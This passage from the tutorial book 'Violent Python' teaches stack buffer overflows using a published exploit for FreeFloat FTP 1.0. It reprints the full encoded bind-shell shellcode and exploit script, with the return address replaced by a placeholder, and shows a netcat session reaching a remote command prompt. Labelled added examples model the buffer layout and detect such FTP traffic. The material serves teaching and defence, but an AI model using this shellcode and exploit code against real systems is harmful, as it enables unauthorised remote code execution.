Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers (10 page)

Writing Your Own Zero-Day Proof of Concept Code

The preceding section and the Conficker worm made use of a stack corruption vulnerability. While the Metasploit Framework contains over eight hundred unique exploits in its arsenal, you may encounter a time when you have to write your own remote code execution exploit. This section explains how Python can help simplify that process. In order to do so, let's begin by understanding stack-based buffer overflows.

The Morris Worm succeeded in part because of a stack-based buffer overflow against the Finger service (US v. Morris, 1991). This class of exploits succeeds because a program fails to sanitize or validate user input. Although the Morris Worm made use of a stack-based buffer overflow attack in 1988, it was not until 1996 that Elias Levy (a.k.a. Aleph One) published the seminal paper "Smashing the Stack for Fun and Profit" in Phrack Magazine (One, 1996). If you are unfamiliar with how stack-based buffer overflow attacks work or would like to learn more, consider reading Elias's paper. For our purposes, we will illustrate only the key concepts behind a stack-based buffer overflow attack.

Stack-Based Buffer Overflow Attacks

In the case of a stack-based buffer overflow, unchecked user data overwrites the saved instruction pointer (EIP) on the stack and thereby takes control of the program's flow. The exploit directs the EIP register to a location containing shellcode inserted by the attacker. Shellcode, a series of machine-code instructions, can allow the exploit to add a user to the target system, open a network connection back to the attacker, or download a stand-alone executable. The possibilities are limited only by the amount of space available in memory.

More Information…
Essential elements of a stack-based buffer overflow exploit

Overflow: user input that exceeds the space allotted for it on the stack.

Return Address: the 4-byte address used to jump directly to the top of the stack. In the following exploit, we use a 4-byte address that points to a JMP ESP instruction in kernel32.dll.

Padding: a series of NOP (no operation) instructions that precedes the shellcode, allowing an attacker to guesstimate the address to jump to. If execution lands anywhere in the NOP sled, it slides directly into the shellcode.

Shellcode: a small piece of code written in machine code. In the following example, we generated the shellcode with the Metasploit Framework.

While many methods for writing exploits exist today, stack-based buffer overflows were the original exploit vector, and an abundance of these exploits still exists and continues to grow. In July of 2011, an acquaintance of mine posted an exploit for a vulnerable FTP server to Packet Storm (Freyman, 2011). Although developing the exploit may appear to be a complex task, the actual attack contains fewer than eighty lines of code (including about thirty lines of shellcode).

Adding the Key Elements of the Attack

Let's begin by building the key elements of our exploit. First we set our shellcode variable to contain the hexadecimal encoding for a payload we created with the Metasploit Framework. Next, we set our overflow variable to contain 246 instances of the letter "A" (\x41 in hex). Our return address variable points to an address location in kernel32.dll containing an instruction that jumps directly to the top of the stack. Our padding variable contains a series of 150 NOP instructions. This builds our NOP sled. Finally, we assemble all of these variables together into a variable we call crash.

 shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"
 "\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"
 "\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"
 "\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"
 "\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"
 "\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"
 "\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"
 "\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"
 "\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"
 "\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"
 "\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"
 "\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"
 "\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"
 "\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"
 "\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"
 "\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"
 "\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"
 "\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"
 "\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"
 "\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"
 "\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"
 "\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"
 "\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"
 "\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"
 "\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"
 "\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"
 "\xba\x1e\x53\x31")

 overflow = "\x41" * 246

 # The 4-byte return address is truncated in this excerpt. The original packs
 # the kernel32.dll JMP ESP address as a little-endian unsigned long ('<L').
 ret = struct.pack('<L', 0xDEADBEEF)  # PLACEHOLDER for the truncated address

 padding = "\x90" * 150

 crash = overflow + ret + padding + shellcode
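To make the arithmetic behind this layout (and the four elements in the sidebar above) concrete, here is an added example that is not code from the book or from Freyman's exploit. It is written in Python 3 rather than the Python 2 of the listing, rebuilds the four regions in the same order, reports the offset at which each region starts, and checks that none of the bytes excluded by the msfencode command in the full script further down (\x00\xff\x0d\x0a\x3d\x20) occur in the result. The shellcode and return address are constructed stand-ins (an int3 marker run and an arbitrary value), not the real payload or the kernel32.dll address, so the buffer is a layout model only.

```python
import struct

# Layout figures taken from the text: 246 filler bytes, a 4-byte return
# address, a 150-byte NOP sled, then the 368-byte encoded payload.
OVERFLOW_LEN = 246
PADDING_LEN = 150
SHELLCODE_LEN = 368

# Bytes excluded by the text's msfencode invocation (-b "\x00\xff\x0d\x0a\x3d\x20"):
# NUL, 0xff, CR, LF, '=' and space. Any of them would terminate or split the
# FTP command argument before the whole buffer reached the vulnerable parser.
EXCLUDED_BYTES = frozenset(b"\x00\xff\x0d\x0a\x3d\x20")

# Constructed stand-ins: neither the real shellcode nor the kernel32.dll
# address is reproduced. 0xCC is an int3 breakpoint, so the stand-in payload
# is a visible marker rather than anything that runs usefully.
STAND_IN_SHELLCODE = b"\xcc" * SHELLCODE_LEN
STAND_IN_RET = struct.pack("<L", 0x11223344)  # constructed, little-endian


def build_crash(ret, shellcode, overflow_len=OVERFLOW_LEN, padding_len=PADDING_LEN):
    """Assemble the buffer in the order the text uses: filler, return
    address, NOP sled, shellcode."""
    if len(ret) != 4:
        raise ValueError("return address must be exactly 4 bytes")
    return b"\x41" * overflow_len + ret + b"\x90" * padding_len + shellcode


def layout(ret, shellcode, overflow_len=OVERFLOW_LEN, padding_len=PADDING_LEN):
    """Return the byte offset at which each region starts, plus the total."""
    ret_off = overflow_len
    sled_off = ret_off + len(ret)
    code_off = sled_off + padding_len
    return {
        "ret": ret_off,
        "nop_sled": sled_off,
        "shellcode": code_off,
        "total": code_off + len(shellcode),
    }


def find_excluded_bytes(buf, excluded=EXCLUDED_BYTES):
    """Return {byte_value: first_offset} for every excluded byte present in buf."""
    found = {}
    for offset, value in enumerate(buf):
        if value in excluded and value not in found:
            found[value] = offset
    return found


if __name__ == "__main__":
    crash = build_crash(STAND_IN_RET, STAND_IN_SHELLCODE)
    print("layout:", layout(STAND_IN_RET, STAND_IN_SHELLCODE))
    print("excluded bytes in buffer:", find_excluded_bytes(crash))
    # A return address that packs to bytes containing NUL or LF is caught here.
    print("excluded bytes in 0x0040100a:", find_excluded_bytes(struct.pack("<L", 0x0040100a)))
```

The total of 768 bytes is the figure the script prints later in the section ("Sending 768 PWND byte crash"), and the return-address check shows why a candidate JMP ESP address is only usable when its little-endian encoding avoids every excluded byte.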

Sending the Exploit

Using the Berkeley Socket API, we create a connection to TCP port 21 on our target host. If this connection succeeds, we authenticate to the host by sending an anonymous username and password. Finally, we send the FTP command "RETR" followed by our crash variable. Since the affected program does not properly sanitize user input, this results in a stack-based buffer overflow that overwrites the saved EIP, causing the program to jump directly into and execute our shellcode.

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 try:
  s.connect((target, 21))
 except:
  print "[-] Connection to " + target + " failed!"
  sys.exit(0)

 print "[*] Sending " + `len(crash)` + " " + command + " byte crash..."
 s.send("USER anonymous\r\n")
 s.recv(1024)
 s.send("PASS \r\n")
 s.recv(1024)
 s.send("RETR" + " " + crash + "\r\n")
 time.sleep(4)
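Seen from the server side, the exchange above has a recognizable shape on the FTP control channel: a verb the server does not implement, followed by an argument far longer than any filename, containing non-printable bytes and a long run of 0x90. The following added example, which is not part of the book, is Python 3 detection logic that applies those checks to a constructed set of command lines. The verb list, the 255-byte argument threshold and the 16-byte sled length are choices made for this example, and the flagged line uses stand-in bytes rather than the real return address or payload.

```python
import re

# Verbs this toy baseline treats as expected traffic. Anything else is flagged,
# mirroring the "any non-implemented command" trigger described in the text.
KNOWN_VERBS = {
    b"USER", b"PASS", b"CWD", b"QUIT", b"PORT", b"PASV", b"TYPE", b"MODE",
    b"RETR", b"STOR", b"LIST", b"NLST", b"PWD", b"SYST", b"NOOP", b"DELE",
    b"MKD", b"RMD", b"SIZE", b"FEAT", b"HELP", b"ABOR", b"REST", b"STAT",
}
MAX_ARG_LEN = 255   # threshold chosen for this example; real filenames are far shorter
NOP_SLED_MIN = 16   # run of 0x90 bytes that is treated as a sled
NOP_SLED = re.compile(rb"\x90{%d,}" % NOP_SLED_MIN)

# Constructed sample of client commands, one control-channel line each. The
# last entry mimics the layout in the text (filler, 4-byte address, NOP sled,
# code) with stand-in bytes for the address and the code.
SAMPLE_COMMANDS = [
    b"USER anonymous\r\n",
    b"PASS \r\n",
    b"RETR readme.txt\r\n",
    b"PWND " + b"\x41" * 246 + b"\x44\x33\x22\x11" + b"\x90" * 150 + b"\xcc" * 8 + b"\r\n",
]


def analyze_command(line):
    """Split one control-channel line into verb and argument and list findings."""
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    findings = []
    if verb.upper() not in KNOWN_VERBS:
        findings.append("unknown_verb")
    if len(arg) > MAX_ARG_LEN:
        findings.append("oversized_argument")
    if any(value < 0x20 or value > 0x7e for value in arg):
        findings.append("non_printable_bytes")
    if NOP_SLED.search(arg):
        findings.append("nop_sled")
    return {"verb": verb, "arg_len": len(arg), "findings": findings}


def scan(lines):
    """Return the analysis of every line that produced at least one finding."""
    return [r for r in (analyze_command(l) for l in lines) if r["findings"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMANDS):
        print("%s arg_len=%d findings=%s" % (hit["verb"].decode(), hit["arg_len"], hit["findings"]))
```

Any one of the four findings on its own can have benign explanations (a client probing FEAT-less servers, a long Unicode path), but an unknown verb combined with an oversized, non-printable argument and a NOP sled is the signature of exactly the traffic this section sends, and it is visible before the vulnerable server ever parses the command.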

Assembling the Entire Exploit Script

Putting this all together, we have Craig Freyman's original exploit as posted to Packet Storm.

 #!/usr/bin/python
 #Title: Freefloat FTP 1.0 Non Implemented Command Buffer Overflows
 #Author: Craig Freyman (@cd1zz)
 #Date: July 19, 2011
 #Tested on Windows XP SP3 English
 #Part of FreeFloat pwn week
 #Vendor Notified: 7-18-2011 (no response)
 #Software Link: http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php

 import socket, sys, time, struct

 # Both the target and the command are required below, so fewer than three
 # argv entries means the usage text should be shown.
 if len(sys.argv) < 3:
  print "[-]Usage:%s " % sys.argv[0] + "\r"
  print "[-]For example [filename.py 192.168.1.10 PWND] would do the trick."
  print "[-]Other options: AUTH, APPE, ALLO, ACCT"
  sys.exit(0)

 target = sys.argv[1]
 command = sys.argv[2]
 if len(sys.argv) > 2:
  platform = sys.argv[2]

 #./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b "\x00\xff\x0d\x0a\x3d\x20"
 #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

 shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"
 "\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f"
 "\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8"
 "\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7"
 "\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"
 "\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c"
 "\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0"
 "\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"
 "\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"
 "\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82"
 "\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf"
 "\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41"
 "\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f"
 "\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a"
 "\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b"
 "\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a"
 "\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"
 "\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea"
 "\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"
 "\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"
 "\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea"
 "\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30"
 "\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53"
 "\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85"
 "\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25"
 "\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10"
 "\xba\x1e\x53\x31")

 #7 FFE4 JMP ESP kernel32.dll
 # The address in the comment above and in the struct.pack() call is truncated
 # in this excerpt; the original packs it as a little-endian unsigned long.
 ret = struct.pack('<L', 0xDEADBEEF)  # PLACEHOLDER for the truncated address
 padding = "\x90" * 150
 crash = "\x41" * 246 + ret + padding + shellcode

 print "\
 [*] Freefloat FTP 1.0 Any Non Implemented Command Buffer Overflow\n\
 [*] Author: Craig Freyman (@cd1zz)\n\
 [*] Connecting to " + target

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 try:
  s.connect((target, 21))
 except:
  print "[-] Connection to " + target + " failed!"
  sys.exit(0)

 print "[*] Sending " + `len(crash)` + " " + command + " byte crash..."
 s.send("USER anonymous\r\n")
 s.recv(1024)
 s.send("PASS \r\n")
 s.recv(1024)
 s.send(command + " " + crash + "\r\n")
 time.sleep(4)

After downloading a copy of FreeFloat FTP to either a Windows XP SP2 or SP3 machine, we can test Craig Freyman's exploit. Notice that he used shellcode that binds TCP port 4444 on the vulnerable target. So we run our exploit script and then use the netcat utility to connect to port 4444 on the target host. If everything succeeds, we now have access to a command prompt on the vulnerable target.

 attacker$ python freefloat2-overflow.py 192.168.1.37 PWND
 [*] Freefloat FTP 1.0 Any Non Implemented Command Buffer Overflow
 [*] Author: Craig Freyman (@cd1zz)
 [*] Connecting to 192.168.1.37
 [*] Sending 768 PWND byte crash...
 attacker$ nc 192.168.1.37 4444
 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.
 C:\Documents and Settings\Administrator\Desktop\>

Chapter Wrap Up

Congratulations! We have written our own tools that can be used during a penetration test. We started by building our own port scanner. Next, we examined ways for attacking the SSH, FTP and SMB protocols and then finished with constructing our own zero-day exploit using Python.

Hopefully, you will find yourself writing code many times over during a penetration test. We have demonstrated some of the basics behind building Python scripts with the intention of advancing our penetration tests. Now that we have a better understanding of the capabilities of Python, let's examine how we can write some scripts to aid us in forensic investigations.

References

1. Ahmad, D. (2008). Two years of broken crypto: Debian's dress rehearsal for a global PKI compromise. IEEE Security & Privacy, pp. 70-73.

2. Albright, D., Brannan, P., & Walrond, C. (2010). Did Stuxnet Take Out 1,000 Centrifuges at the Natanz Enrichment Plant? ISIS Report, November 22. Retrieved 31.10.11.

3. Eichin, M., & Rochlis, J. (1989). With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988, February 9. <www.utdallas.edu/~edsha/UGsecurity/internet-worm-MIT.pdf> Retrieved 31.10.11.

4. Elmer-Dewitt, P., McCarroll, T., & Voorst, B. V. (1988). Technology: the kid put us out of action. Time Magazine, October 14. <http://www.time.com/time/magazine/article/0,9171,968884,00.html> Retrieved 30.10.11.

5. Freyman, C. (2011). FreeFloat FTP 1.0 Any Non Implemented Command Buffer Overflow ≈ Packet Storm. Packet Storm ≈ Full Disclosure Information Security, July 18. <http://packetstormsecurity.org/files/view/103166/freefloat2-overflow.py.txt> Retrieved 31.10.11.

6. GAO. (1989). Report to the Chairman, Subcommittee on Telecommunications and Finance, Committee on Energy and Commerce, House of Representatives. "Virus Highlights Need for Improved Internet Management." United States General Accounting Office. Retrieved 31.10.11.

7. Huang, W. (2011). Armorize Malware Blog: k985ytv mass compromise ongoing, spreads fake antivirus. Armorize Malware Blog, August 17. <http://blog.armorize.com/2011/08/k985ytvhtm-fake-antivirus-mass.html> Retrieved 31.10.11.

8. Markoff, J. (2009). Defying experts, rogue computer code still lurks. The New York Times, August 27. <http://www.nytimes.com/2009/08/27/technology/27compute.html> Retrieved 30.10.11.

9. Moore, H. D. (2008). Debian OpenSSL predictable PRNG toys. Digital Offense. <http://digitaloffense.net/tools/debian-openssl/> Retrieved 30.10.11.

10. Nahorney, B. (2009). The Downadup Codex: a comprehensive guide to the threat's mechanics. Symantec | Security Response. <www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_downadup_codex_ed2.pdf> Retrieved 30.10.11.

11. One, A. (1996). Smashing the stack for fun and profit. Phrack Magazine, August 11. <http://www.phrack.org/issues.html?issue=49&id=14#article> Retrieved 30.10.11.

12. US v. Morris (1991). 928 F. 2d 504 (C. A. 2nd Circuit, Mar. 7). Google Scholar. <http://scholar.google.com/scholar_case?case=551386241451639668> Retrieved 31.10.11.

13. Vaskovich, F. (1997). The Art of Port Scanning. Phrack Magazine, September 1. <http://www.phrack.org/issues.html?issue=51&id=11#article> Retrieved 31.10.11.
